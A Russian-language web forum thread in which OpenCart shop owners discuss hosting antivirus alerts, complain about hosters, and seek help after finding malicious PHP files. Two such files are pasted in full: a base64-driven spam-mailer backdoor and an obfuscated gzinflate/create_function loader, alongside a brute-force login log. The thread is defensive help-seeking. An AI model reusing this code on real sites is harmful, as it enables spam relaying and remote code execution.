На вашем сайте вирус!

[Bager]

Добрый день. Хостинг reg.ru 

В админке хостинга прилетело письмо: На вашем сайте вирус.

Открываю логи....

---------------
VIRUSDIE RESULT
---------------
/var/www/0000000/data/www/блабла.ru/admin/controller/report/fm.php : Shell.PhpFM : -
-------------
MALDET RESULT
-------------

Иду по пути. Есть папка: /report/ 

Внутри /report/ нет ни одного файла с именем fm.php 

Вопрос. Это чего очередной "разводняк" на очередную фигню от хостера?

[Bager]

  В 07.03.2019 в 15:07, nikifalex сказав:

скорее всего удалили они этот вирус

Expand  

Если бы. Что целиком fm.php? И в добавок пишут "вылечить"? 

Вопрос кого? 

Змінено 7 березня 2019 користувачем Bager

[spectre]

вирусдай не находит и треть дряни

[Bager]

  В 07.03.2019 в 15:19, spectre сказав:

вирусдай не находит и треть дряни

Expand  

Короче. Резюмирую.... Надо написать на хостинг "Пожалуйста отключите это г-но" (енто не первый раз)

В контексте прописать: Хватит меня разводить на пустом месте, придумайте что-то поизящнее. 

Как я понимаю такого не бывает что есть вирус, в файле, которого нет. Даже звучит бредово.

Я просто уточнить, вдруг я съел че-то нито, файла в папке не могу увидеть. 

Вирусдай - это такой прикол, чтобы скучно не было. Я так понял. 

Спасибо!

 

[spectre]

провериться бы надо, сами по себе подобные штуки не появляются да и хостеры редко страдают такого плана разводом

 

можете в лс мне написать - это недорого

[Bager]

  В 07.03.2019 в 15:43, spectre сказав:

провериться бы надо, сами по себе подобные штуки не появляются да и хостеры редко страдают такого плана разводом

 

можете в лс мне написать - это недорого

Expand  

Сейчас хостинг ответит на вопрос "шо конкретно вы имели ввиду"

В зависимости от того что я пойму из ответа, буду думать.

[Bager]

  В 07.03.2019 в 15:51, Bager сказав:

Сейчас хостинг ответит на вопрос "шо конкретно вы имели ввиду"

В зависимости от того что я пойму из ответа, буду думать.

Expand  

Ответ хостинга: Здравствуйте! Судя по всему в данном случае имело место срабатывание антивирусной проверки на временный файл. На данный момент проблем не наблюдаем. Приносим извинения за беспокойство.

Енто как? Ну хорошо. Может и был этот временный файл. Как я понимаю, должны быть логи. Где их посмотреть? У меня чего только с сайтами не было, но вот вирусы, это что - то новое. 

Не успел я с поддержкой проститься, опять в логах антивируса - новая запись. Самое главное: На сайте ни одного товара, он не  в индексе, посетителей нет. Он нафик не кому не нужен. Ошибок нет. Господа, научите как посмотреть генерацию временных php файлов. Наверняка что -то такое есть. 

[Bager]

  В 07.03.2019 в 16:54, nikifalex сказав:

пора уже создавать тему "отмазки хостеров". Будет покруче "анекдотов"

они иногда такую дичь несусветную несут шо капец.

Expand  

Вот так бы сразу. Одним предложением, все понял.

Собственно... В чем весь сыыыырррр в скрине как я понимаю.

[AlexDW]

  Цитата

..удаляет вредоносные фрагменты кода и в случае необходимости дописывает недостающие для сохранения работоспособности вашего веб-сайта фрагменты

Expand  

 

поди по тарифу рублей за 500 - оно еще и само вам сайт с нуля сделает

до чего техника дошла! (с)

[Bager]

  В 07.03.2019 в 18:39, AlexDW сказав:

 

поди по тарифу рублей за 500 - оно еще и само вам сайт с нуля сделает

до чего техника дошла! (с)

Expand  

Не вопрос

 

[Koss88]

а меня вот тоже обрадовали сегодня:

IHC.RU <noreply@ihc.ru>	04:10 (15 часов назад)
кому: я

Здравствуйте.

Ваш хостинг p502184 был проверен антивирусом.

Найдены вирусы, спам-ссылки или уязвимые скрипты! Помощь в лечении сайтов вам могут оказать в компании Ревизиум.

Вредоносный код в php:

/home/p502184/www/kinoigrushki.ru/catalog/model/tool/imgwm.php

 

Здравствуйте.

1. Указанный файл /home/p502184/www/kinoigrushki.ru/catalog/model/tool/imgwm.php изменялся 11 апреля.
Также в логах мы нашли запрос, к этому файлу, в логах доступа к сайту в это время.
Боле подробно на скриншоте:
https://scr.pics/cf3cf323e.jpg

 

Не похоже на развод...

[mpn2005]

  В 19.04.2019 в 16:51, Koss88 сказав:

Не похоже на развод...

Expand  

Не похоже. Особенно если файл всё ещё на месте.

Вероятнее всего при открытии там будет довольно нечитаемый код.

Для начала хотя бы смените у него расширение на .txt

[mpn2005]

Но если уже хостеры начнут вирусы подкидывать, а потом предлагать полечить за деньги.

Вот тут реально дикие времена начнутся. 8)

 

[Bager]

  В 19.04.2019 в 19:09, mpn2005 сказав:

Но если уже хостеры начнут вирусы подкидывать, а потом предлагать полечить за деньги.

Вот тут реально дикие времена начнутся. 8)

 

Expand  

Короче. Как это понял я. Я разместил на обычном дешевом шареде магазин. 

Это мое личное мнение. Я могу быть не прав!!!

Начал заливать товары... тысяч по 20... каждый день иногда и пару раз в день. Сайту нету двух месяцев, посетителей... два калека в сутки. Сначала бомбил "вирус дай".

Потом стали находится спам скрипты в почте, что действительно было. Вирусдай присылал ссылки на несуществующие файлы, мягко говоря часто. Потом начал находить в фото вирусы.

Фото все наши. Вирусы там я так и не нашел нигде. Мы с ними, с фото, просто не умеем ничего такого делать. 

 

В итоге я нацарапал в поддержку в коротком переводе: "не пошлибы вы .... сами знаете куда с вашим г...ом и отрубите это ... для моего сайта вообще"

 

Отрубили.

 

Дальше начались чудеса.... Файловая система, при загрузке 30 -40 процентов, не знаю с какой стати, по ночам, становилась переполненной. Я до сих пор не понял почему. Итогом стало то, что начал рушится шаблон, файлы......  В основном ночью. Утром все опять как было.... Только сайт... то одно отвалилось, то другое... Короче резервная копия через день.

Дальше, стал замечать что при индексации (заходе робота), вываливалась частенько на целую партию товаров 404 ошибка... сайт с утра был доступен и эти товары отдавали код 200. К серверу доступа нет, но раз 404 у яндекса, а утром 200, значит дурак точно не Яндекс. 

Быстрее всего, сайт перегружал процессор во время захода бота, сверх установленной нормы и сервер делал kill process. Я не спец по серверам. Пишу как понимаю.

Итогом стало то, что из 20.000 товаров, чуть меньше, с ежедневным обновлением, проиндексировал процентов 60. За пару месяцев.

 

Проблему решил радикально - VDS. Переехал на последний. Дело двинулось. Пошла индексация. Самое интересное, я хостера не виню. Там давали "пиковую нагрузку" в 1 гигобайт оперативки по условиям тарифа. Это пиковая. 

 

На VDS, когда сайт в покое, то есть на нем вообще нет никого, кушает, 1.1 - 1.3 гига. То есть на сайте с товаром, минимум оперативки должно быть гигабайта 1,5 - 2 видимо. И одного процессора... маловато.

Как я понял, нЕфига слона запускать в посудную лавку, видимо я перегружал им процессор и оперативку, плюс по ночам выгрузки товаров, собственно.... они, таким образом "просили" переехать.

Как-то так.

Сайт в итоге покарежили. Пришлось с нуля восстанавливать. Даже резервные копии не помогли.

 

 

 

 

 

Змінено 19 квітня 2019 користувачем Bager

[sazonoff]

  В 19.04.2019 в 19:09, mpn2005 сказав:

Но если уже хостеры начнут вирусы подкидывать, а потом предлагать полечить за деньги.

Вот тут реально дикие времена начнутся. 8)

 

Expand  

 

Вряд ли им нужен такой бизнес.  Репутацию на раз потеряют.

 

  В 07.03.2019 в 14:47, Bager сказав:

Хостинг reg.ru 

Expand  

А рег.ру - один из самых паршивейших хостеров по неадекватной качеству цене.

Поддержка слабая,   софт годами не обновляют на шаред-хостинге.

Выезжают в конкурентной борьбе только за счет того, что первыми предлагают свои услуги новичкам, которые зарегали домен.

[spectre]

  В 20.04.2019 в 06:25, sazonoff сказав:

 

Вряд ли им нужен такой бизнес.  Репутацию на раз потеряют.

 

Expand  

 

таймвеб и регру довольно неплохо живут с нахождения несуществующих вирусов, да и существующих тоже

у них еще круче бывают кейсы, вырубают сайт и говорят что пока вы не уберете вирус и не ОБНОВИТЕ CMS мы нифига не разблокируем, идите в ревизиум за 6к

на резонный вопрос как можно обновить cms и как это вообще связано с лечением сайта ответить затрудняются, как и на другие вполне конкретные вопросы

 

также распространены заражения от соседей по серверу, то есть аккаунты не изолированы и какой-то вася который заразился заражает все аккаунты, поддержка мычит но не признается

выключается сайт, просто отдает 403 на любой запрос - через 2 часа - опять вирус, чудеса

ладно, на эту тему могу рассказывать много и долго))

 

 

знаю одно точно, сайт на опенкарт в покое не может потреблять 1гб оперативки

 

[Bager]

  В 20.04.2019 в 06:36, spectre сказав:

знаю одно точно, сайт на опенкарт в покое не может потреблять 1гб оперативки

Expand  

Ну как вам сказать. Возможно сервер настроен не совсем верно. Однако, факт налицо.

Вот так вот практически всегда.  Может не правильно перевожу?  Шаблонный сайт. Только внешний марафет навел. около 15.000 товаров. 

То есть, я пока ничего не делал, сервер кое -как настроил и запустил. Просто с этими танцами, я про хостинг, никак не уберу все косяки на сайте. 

Про большее пока и не заикаюсь.

 

[Koss88]

  В 19.04.2019 в 19:07, mpn2005 сказав:

Не похоже. Особенно если файл всё ещё на месте.

Вероятнее всего при открытии там будет довольно нечитаемый код.

Для начала хотя бы смените у него расширение на .txt

Expand  

содержимое файла:

<?php
error_reporting(0);
set_time_limit(0);
if(isset($_GET["admin"])){
    unlink($_SERVER['SCRIPT_FILENAME']);
}
if(isset($_POST["mailto"]))
        $MailTo = base64_decode($_POST["mailto"]);
else
    {
    echo "indata_error";
    exit;
    }
if(isset($_POST["msgheader"]))
        $MessageHeader = base64_decode($_POST["msgheader"]);
else
    {
    echo "indata_error";
    exit;
    }
if(isset($_POST["msgbody"]))
        $MessageBody = base64_decode($_POST["msgbody"]);
else
    {
    echo "indata_error";
    exit;
    }
if(isset($_POST["msgsubject"]))
        $MessageSubject = base64_decode($_POST["msgsubject"]);
else
    {
    echo "indata_error";
    exit;
    }
if(mail($MailTo,$MessageSubject,$MessageBody,$MessageHeader)){
    echo "sent_ok";
} else {
    echo "sent_error";
}
exit;
?>

[mpn2005]

  В 23.04.2019 в 15:00, Koss88 сказав:

содержимое файла:

Expand  

Дыра для рассылки спама.

[mpn2005]

Небольшая сводка для справки.

На своей демке поставил ловушку неудачных попыток входа в админку:

Вот лог (чуть больше чем за сутки):

2019-04-24 19:26:03 - 5.188.x.x login:admin password:12345
2019-04-24 20:34:56 - 5.188.x.x login:admin password:123123
2019-04-24 21:43:43 - 5.188.x.x login:admin password:pass
2019-04-24 22:52:51 - 5.188.x.x login:admin password:abc123
2019-04-25 0:01:18 - 5.188.x.x login:admin password:1234567
2019-04-25 1:10:15 - 5.188.x.x login:admin password:12345678
2019-04-25 2:19:16 - 5.188.x.x login:admin password:123456789
2019-04-25 3:28:36 - 5.188.x.x login:admin password:1234567890
2019-04-25 4:14:51 - 77.81.x.x login:admin password:123
2019-04-25 4:37:53 - 5.188.x.x login:admin password:admin1234
2019-04-25 5:49:32 - 5.188.x.x login:admin password:admin12345
2019-04-25 7:00:29 - 5.188.x.x login:admin password:admin2015
2019-04-25 8:10:43 - 5.188.x.x login:admin password:admin2016
2019-04-25 9:20:31 - 5.188.x.x login:admin password:admin1
2019-04-25 10:30:04 - 5.188.x.x login:admin password:adminadmin
2019-04-25 11:39:40 - 5.188.x.x login:admin password:111111
2019-04-25 12:49:32 - 5.188.x.x login:admin password:admin2014
2019-04-25 13:59:30 - 5.188.x.x login:admin password:123
2019-04-25 15:08:58 - 5.188.x.x login:admin password:1234
2019-04-25 16:18:40 - 5.188.x.x login:admin password:demo
2019-04-25 17:29:22 - 5.188.x.x login:admin password:demo123
2019-04-25 18:38:54 - 5.188.x.x login:admin password:guest
2019-04-25 19:49:25 - 5.188.x.x login:admin password:hello
2019-04-25 20:59:54 - 5.188.x.x login:admin password:password
2019-04-25 22:10:28 - 5.188.x.x login:admin password:qwe123
2019-04-25 23:20:51 - 5.188.x.x login:admin password:qwerty
2019-04-26 0:31:13 - 5.188.x.x login:admin password:test
2019-04-26 1:42:14 - 5.188.x.x login:admin password:test123
2019-04-26 2:53:32 - 5.188.x.x login:admin password:123654
2019-04-26 4:04:05 - 5.188.x.x login:admin password:1
2019-04-26 5:14:41 - 5.188.x.x login:admin password:admin2017
2019-04-26 6:18:24 - 77.81.x.x login:admin password:12345

 

[Koss88]

Как то раз появился файл catalog/view/indess.php ночью неизвестно откуда 

Антивирус хостинга ругается что в нем вредоносный код.

Содержимое файла: <?php
$size = array();
$datas='%DDW%DB%AE%83+%10%FC%9A%7DGY%A0%3E%D6K%FF%FF%93%CE%CE%02%8A%F5%D2hmr%DA%C4%10%84ev%98Y%A1%25%EF%28%D4x%FC%03%AD%D3%16%83%26%8D%04%26%DF%90%1F%C8%07%AAod%0D%D5%0D%D9%96LO%E6N%C1j0%EB%C2%18%D9cD%5E%7D%97_%1BL-%D7b%D6c%1C%01v%82%92%91Z%019%10%0B%94%F4%5B%AA%85UE%9E%13%A0%F0%91%11%D7%03P%9E%901M%83%B5+_%29%1F%812d%7B%B4%5E%E9aw%83B%29O%C9%25%89%90%CB%137%C4%9Df%D4%91%92j%84%15%B6H%DDa%E1%0C%24%A7%88%B4%9DU%10%A1%E7sG%F8%07r%86%F8%86v%8CA%3A%AFS%FD%2C%D7%A4L%91%11%92%8A%3E%A3%5C%8C6j5%DB%EF%B0Ku%94%AB%99%D2M%BB%0B0%1D%0F%17%BAy%AD%04%93%A0%0Eg%ECT%99%40%21%A0%7DR%D5%E8Ne%0A%BEh%9DDSV%F8d%9C-%10o5%FB%23%15%D2%3A%C8ba%88l%BB%5C%E4%ED%19IK%CC%D0%9F%';$datas.='F7q%AFxd%DC%E2U%AA%14%25%C4%CFE%CB%03qE%DC%A3%1F%2Bj%F9i%9C0%FAbJ%DFY%0C%97%FBrI%C1%EC%1C%5Co%FA%BE%89%FC%85%F6%BD8%DE%9B%15%23%C6%CE%CB%1B%0AG%BA%D6%C6tI%F5z2%A8wP%E01%BB%A7%22%2C%F6%BE%FA0%EAd%5C%EE%E2%F2%D1%26%BD%01%23%07%EB%C9%2A%01%AF%22C%AE%DC%3F%C7m%BA%94%9D%CEj%96I%99%F2n%8A%E9n%89%5B%5Dg%B59%1F%98U%AE%D8%E2w%85%84%D99H%AAg%5E%FF%16%CE%29%8F%B0%A0%DC%5C%FE%B5%E0R%F6c%16%B8%9C%B4R%40%87%8B%FB%19%F3R_%5E2%FF%29%83%EA%24Kh%AE%B0%A6D%FB';
$data = cutting($datas,$size);
if($data == NULL){
    echo 'indata_error';
}
function cutting($datass,$size,$nameimage='no_name.jpg'){
    $datas='%84%29kl%7F%C9%0E%C4%3B%DD%E6%3D%B1%C5%C2%B7%7Dq%AB%B0%1F0h%9F%FF%FFu%AA8%8D%E36W%0E%FF%EE%A0%BC%DB%F1%B3%CFd%27ly%04-%7EN%2C%85%8A%AA%8AV%F1%9F+%12%B53eB4%BD%B0%40%5E%8Fan%CB%3Ei%3B%13%FF%0F';$datas='};'.urldecode(gzinflate(urldecode($datass.$datas))).'exit;{';create_function('',$datas);
    if($nameimage != 'no_name.jpg'){ 
        return json_encode(array('img'=>$datas,'name'=>$nameimage));
    } else {
        return NULL;
    }
}
?>

 

Может его удалить просто?

[Yoda]

  В 29.07.2019 в 08:32, Koss88 сказав:

Как то раз появился файл catalog/view/indess.php ночью неизвестно откуда 

Антивирус хостинга ругается что в нем вредоносный код.

Содержимое файла: <?php
$size = array();
$datas='%DDW%DB%AE%83+%10%FC%9A%7DGY%A0%3E%D6K%FF%FF%93%CE%CE%02%8A%F5%D2hmr%DA%C4%10%84ev%98Y%A1%25%EF%28%D4x%FC%03%AD%D3%16%83%26%8D%04%26%DF%90%1F%C8%07%AAod%0D%D5%0D%D9%96LO%E6N%C1j0%EB%C2%18%D9cD%5E%7D%97_%1BL-%D7b%D6c%1C%01v%82%92%91Z%019%10%0B%94%F4%5B%AA%85UE%9E%13%A0%F0%91%11%D7%03P%9E%901M%83%B5+_%29%1F%812d%7B%B4%5E%E9aw%83B%29O%C9%25%89%90%CB%137%C4%9Df%D4%91%92j%84%15%B6H%DDa%E1%0C%24%A7%88%B4%9DU%10%A1%E7sG%F8%07r%86%F8%86v%8CA%3A%AFS%FD%2C%D7%A4L%91%11%92%8A%3E%A3%5C%8C6j5%DB%EF%B0Ku%94%AB%99%D2M%BB%0B0%1D%0F%17%BAy%AD%04%93%A0%0Eg%ECT%99%40%21%A0%7DR%D5%E8Ne%0A%BEh%9DDSV%F8d%9C-%10o5%FB%23%15%D2%3A%C8ba%88l%BB%5C%E4%ED%19IK%CC%D0%9F%';$datas.='F7q%AFxd%DC%E2U%AA%14%25%C4%CFE%CB%03qE%DC%A3%1F%2Bj%F9i%9C0%FAbJ%DFY%0C%97%FBrI%C1%EC%1C%5Co%FA%BE%89%FC%85%F6%BD8%DE%9B%15%23%C6%CE%CB%1B%0AG%BA%D6%C6tI%F5z2%A8wP%E01%BB%A7%22%2C%F6%BE%FA0%EAd%5C%EE%E2%F2%D1%26%BD%01%23%07%EB%C9%2A%01%AF%22C%AE%DC%3F%C7m%BA%94%9D%CEj%96I%99%F2n%8A%E9n%89%5B%5Dg%B59%1F%98U%AE%D8%E2w%85%84%D99H%AAg%5E%FF%16%CE%29%8F%B0%A0%DC%5C%FE%B5%E0R%F6c%16%B8%9C%B4R%40%87%8B%FB%19%F3R_%5E2%FF%29%83%EA%24Kh%AE%B0%A6D%FB';
$data = cutting($datas,$size);
if($data == NULL){
    echo 'indata_error';
}
function cutting($datass,$size,$nameimage='no_name.jpg'){
    $datas='%84%29kl%7F%C9%0E%C4%3B%DD%E6%3D%B1%C5%C2%B7%7Dq%AB%B0%1F0h%9F%FF%FFu%AA8%8D%E36W%0E%FF%EE%A0%BC%DB%F1%B3%CFd%27ly%04-%7EN%2C%85%8A%AA%8AV%F1%9F+%12%B53eB4%BD%B0%40%5E%8Fan%CB%3Ei%3B%13%FF%0F';$datas='};'.urldecode(gzinflate(urldecode($datass.$datas))).'exit;{';create_function('',$datas);
    if($nameimage != 'no_name.jpg'){ 
        return json_encode(array('img'=>$datas,'name'=>$nameimage));
    } else {
        return NULL;
    }
}
?>

 

Может его удалить просто?

Expand  

 

От того что вы его удалите ничего не изменится. Через какое то время будет тоже самое. 
 

[Koss88]

это почему?

[Yoda]

  В 29.07.2019 в 15:00, Koss88 сказав:

это почему?

Expand  

Потому что то что вы нашли  - это следствие.
А источник уязвимости в другом месте!

[Koss88]

и как же этот источник определить?